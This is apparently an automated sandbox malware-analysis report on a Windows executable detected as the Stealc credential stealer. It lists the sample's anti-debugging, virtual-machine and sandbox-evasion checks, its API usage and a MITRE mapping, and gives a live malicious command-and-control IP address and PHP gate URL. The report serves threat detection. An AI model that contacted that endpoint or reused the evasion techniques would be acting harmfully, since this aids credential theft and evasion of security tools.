                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16261 second address: B1627E instructions: 0x00000000 rdtsc 0x00000002 je 00007FB9C8FCDCA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jo 00007FB9C8FCDCA6h 0x00000011 jmp 00007FB9C8FCDCABh 0x00000016 pop esi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1627E second address: B162A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8FCBEA5h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB9C8FCBE9Fh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B162A6 second address: B162AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19B12 second address: B19B30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9C8FCBEA8h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19B30 second address: B19B34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19B34 second address: B19B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9C8FCBEA9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19E3F second address: B19E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19E45 second address: B19E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19E4D second address: B19E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19E51 second address: B19E55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A413 second address: B1A417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A417 second address: B1A41B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A41B second address: B1A426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A426 second address: B1A42C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A42C second address: B1A430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A430 second address: B1A43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A43C second address: B1A446 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB9C8FCDCA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A82A second address: B1A82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A82F second address: B1A83B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 ja 00007FB9C8FCDCA6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A83B second address: B1A865 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB9C8FCBEA9h 0x00000010 jg 00007FB9C8FCBE96h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1EBDE second address: B1EBE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1EBE9 second address: B1EBED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F145 second address: B1F1B6 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB9C8FCDCA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FB9C8FCDCA8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov edx, dword ptr [ebp+12473A80h] 0x0000002e push dword ptr [ebp+122D3005h] 0x00000034 jmp 00007FB9C8FCDCB5h 0x00000039 mov dh, 95h 0x0000003b call 00007FB9C8FCDCA9h 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FB9C8FCDCB2h 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F1B6 second address: B1F1BB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F1BB second address: B1F1E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jc 00007FB9C8FCDCB0h 0x0000000e pushad 0x0000000f jnl 00007FB9C8FCDCA6h 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jbe 00007FB9C8FCDCA6h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F1E1 second address: B1F1EB instructions: 0x00000000 rdtsc 0x00000002 js 00007FB9C8FCBE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F1EB second address: B1F1F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B20AFB second address: B20B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9C8FCBEA1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B20B12 second address: B20B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B20B16 second address: B20B24 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B20B24 second address: B20B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B20B28 second address: B20B52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FB9C8FCBEA3h 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FB9C8FCBE96h 0x00000016 jl 00007FB9C8FCBE96h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B20B52 second address: B20B5C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B20B5C second address: B20B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180338 second address: 518033E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518033E second address: 5180342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180374 second address: 518037A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518037A second address: 518038C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a mov ax, F891h 0x0000000e push eax 0x0000000f push edx 0x00000010 mov al, 28h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518038C second address: 51803A9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebp 0x0000000a jmp 00007FB9C8FCDCABh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51803A9 second address: 51803AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51803AD second address: 51803B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51803B3 second address: 51803B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51803B9 second address: 51803BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51803BD second address: 51803D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB9C8FCBE9Ah 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51803D4 second address: 51803E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8FCDCABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 891A9C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: ABCBDE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00644910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00644910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0063DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0063E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00644570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00644570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0063ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0063BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0063DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006316D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00643EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00643EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0063F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00631160 GetSystemInfo,ExitProcess,0_2_00631160
                Source: file.exe, file.exe, 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1787435060.00000000014A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWz
                Source: file.exe, 00000000.00000002.1787435060.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1787435060.0000000001473000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1787435060.000000000142E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13432
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13451
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13429
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13483
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13443
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006345C0 VirtualProtect ?,00000004,00000100,000000000_2_006345C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00649860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00649860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00649750 mov eax, dword ptr fs:[00000030h]0_2_00649750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00647850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00647850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6756, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00649600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00649600
                Source: file.exe, file.exe, 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: <_Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00647B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00646920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00646920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00647850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00647850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00647A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00647A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.630000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1746371608.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1787435060.000000000142E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6756, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.630000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1746371608.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1787435060.000000000142E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6756, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/ws17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpO17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37file.exe, 00000000.00000002.1787435060.000000000142E000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phpOfile.exe, 00000000.00000002.1787435060.0000000001488000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/wsfile.exe, 00000000.00000002.1787435060.0000000001488000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37tfile.exe, 00000000.00000002.1787435060.000000000142E000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  185.215.113.37
                  		unknownPortugal
                  		206894WHOLESALECONNECTIONSNLtrue

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1525381
                  Start date and time:2024-10-04 04:40:05 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 3m 5s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:1
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:file.exe
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 80%
                  • Number of executed functions: 19
                  • Number of non-executed functions: 80
